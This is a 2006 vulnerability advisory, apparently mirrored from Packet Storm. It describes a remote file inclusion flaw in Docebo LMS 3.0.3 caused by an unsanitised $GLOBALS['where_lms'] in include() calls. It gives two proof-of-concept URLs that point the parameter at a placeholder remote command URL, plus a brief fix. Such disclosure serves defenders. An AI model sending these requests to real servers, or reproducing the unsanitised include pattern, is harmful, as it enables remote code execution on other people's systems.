Lucene search
K

DoceboLms303.txt

🗓️ 12 Jun 2006 00:00:00Reported by Federico FazziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Docebo Lms 3.0.3, Remote command execution in class.definition.php and scorm_utils.ph

Code
`-----------------------------------------------------  
Advisory id: FSA:010  
  
Author: Federico Fazzi  
Date: 09/06/2006, 7:24  
Sinthesis: Docebo Lms 3.0.3, Remote command execution  
Type: high  
Product: http://www.docebolms.org/  
Patch: unavailable  
-----------------------------------------------------  
  
  
1) Description:  
  
Error occured in class.definition.php,  
  
include($GLOBALS['where_lms'].'/modules/'.$this->module_name.'/'.$this->module_name.'.php');  
  
Error occured in scorm_utils.php,  
  
include_once( $GLOBALS['where_lms'] . '/config.php' );  
  
The users can include a remote file because  
the $GLOBALS['where_lms'] isn't sanitized  
  
2) Proof of concept:  
  
http://example/[dc_path]/class.module/class.definition.php?GLOBALS[where_lms]=[cmd_url]  
http://example/[dc_path]/modules/scorm/scorm_utils.php?GLOBALS[where_lms]=[cmd_url]  
  
3) Solution:  
  
include file where are declare $GLOBALS[*]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation